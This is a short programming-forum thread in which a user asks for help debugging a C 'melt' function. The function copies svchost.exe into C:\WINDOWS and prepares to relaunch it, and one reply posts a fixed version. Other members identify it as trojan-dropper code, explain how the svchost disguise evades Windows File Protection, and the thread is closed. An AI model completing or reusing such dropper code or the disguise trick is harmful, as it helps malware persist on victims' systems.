help with my function..

**Foxy999** · 12-22-2010

I am not sure why, but my function causes my program to crash.

Code:

int melt()
{
        FILE *f1 = fopen("C:\\WINDOWS\\svchost.exe", "r");
        if(f1 == NULL)
        {
                system("copy svchost.exe C:\\WINDOWS\\");
                char dir[300];
                char exe[600];
                getcwd(dir, sizeof(dir));
                strcpy(exe, "C:\\WINDOWS\\svchost.exe ");
                strncat(exe, dir, sizeof(dir));
                strcat(exe, "\\svchost.exe");
                printf("%s", exe); /* crashes right after exe is printed */
                //system(exe);
                return 1;
        }
        fclose(f1);
        return 0;
}

Nothing will execute after exe is printed. Please help.

Thanks,
Foxyy

**nimitzhunter** · 12-22-2010

Originally Posted by Foxy999

I am not sure why, but my function causes my program to crash.

Code:

int melt()
{
        FILE *f1 = fopen("C:\\WINDOWS\\svchost.exe", "r");
        if(f1 == NULL)
        {
                system("copy svchost.exe C:\\WINDOWS\\");
                char dir[300];
                char exe[600];
                getcwd(dir, sizeof(dir));
                strcpy(exe, "C:\\WINDOWS\\svchost.exe ");
                strncat(exe, dir, sizeof(dir));
                strcat(exe, "\\svchost.exe");
                printf("%s", exe); /* crashes right after exe is printed */
                //system(exe);
                return 1;
        }
        fclose(f1);
        return 0;
}

Nothing will execute after exe is printed. Please help.

Thanks,
Foxyy

You return 1 inside the if statement, then you return 0 after you exit "if". that may be the cause. Use "else" or "else if". if you don't want to return, just declare the return type "void".
and what do you mean by crash? like nothing is executed? or you get a runtime error? how are you using the return value of melt()?

**tabstop** · 12-22-2010

Opening an .exe file in "r" mode makes me igry. If all you want to do is see whether the file exists, there are better ways, such as whatever the Windows equivalent of fstat is (or since it's POSIX there might even be _fstat available).
You may want strlen(dir)+1 in lieu of sizeof(dir) in your strncat -- strncat should stop on a \0 character anyway, but you might as well be honest with what you want.
I have no idea what the maximum path length is, but there's a macro for it and why not use it instead of 300?
What kind of a crash do you get? After all, there's no code left to run....

**adeyblue** · 12-22-2010

It's Windows' way of telling you to stop being a numpty skiddie

**Foxy999** · 12-22-2010

The problem was that I thought strcat added the null character..

Sorry,
Foxyy

**tabstop** · 12-22-2010

Originally Posted by Foxy999

The problem was that I thought strcat added the null character..

Sorry,
Foxyy

It does.

**zfk** · 12-22-2010

strncat(exe, dir ,strlen(dir)) instead of strncat(exe, dir, sizeof(dir)) may be can slove your question.

Code:

int melt()
{
	FILE *f1 = fopen("C:\\WINDOWS\\svchost.exe", "r");
	if(f1 == NULL)
	{
		system("copy svchost.exe C:\\WINDOWS\\");
		char dir[260] = {0};
		char exe[260] = {0};
		getcwd(dir, sizeof(dir));
		strcpy(exe, "C:\\WINDOWS\\svchost.exe ");
		strncat(exe, dir, strlen(dir));
		strcat(exe, "\\svchost.exe");
		printf("%s", exe); /* crashes right after exe is printed */
		//system(exe);
		return 1;
	}
	fclose(f1);
	return 0;
}

**~~CommonTater~~** · 12-22-2010

Most likely it's windows file protection stopping you from messing with protected OS files.

svhost.exe is the hosting program for Windows Services, it is protected and even if replaced it will be written over by a protected copy from the file cash.

Effectively you are trying to circumvent a primary security system in Windows, your program is behaving in the manner of a trojan dropper... and it's not going to like that.

**quzah** · 12-22-2010

Originally Posted by CommonTater

Effectively you are trying to circumvent a primary security system in Windows, your program is behaving in the manner of a trojan dropper... and it's not going to like that.

Neither will the forum admins.

OP, go read the forum guidelines.

Quzah.

**Foxy999** · 12-22-2010

Originally Posted by quzah

Neither will the forum admins.

OP, go read the forum guidelines.

Quzah.

I am in windows xp, and there is no such file as C:\WINDOWS\svchost.exe, I was just using the name.. If i was writing a 'trojan' I would target the system32 directory.

Foxyy

**~~CommonTater~~** · 12-23-2010

Originally Posted by Foxy999

I am in windows xp, and there is no such file as C:\WINDOWS\svchost.exe, I was just using the name.. If i was writing a 'trojan' I would target the system32 directory.

Foxyy

Ummmm.... no you wouldn't because that would trigger Windows File Protection and fail.

Placing a "looks like it ought to be there" file in C:\Windows instead is a well known way of getting around WFP and allowing your virus to continue it's function. Most people will overlook this because they're used to seeing multiple copies of the REAL svhost.exe running in task manager.

In fact there are several well known Trojan horses that use the C:\Windows\svhost.exe gambit to infect machines.

virus svchost.exe - Google Search

The code you have asked for help with is that portion of a trojan horse that would replace the file every time we delete it...

**Salem** · 12-23-2010

I'm really not liking where this is going - closed.

Thread: help with my function..

Thread Tools

Search Thread

Display

help with my function..

Similar Threads

Compiling C in Visual Studio 2005

Compiling sample DarkGDK Program

Seg Fault in Compare Function

How to fix misaligned assignment statements in the source code?

const at the end of a sub routine?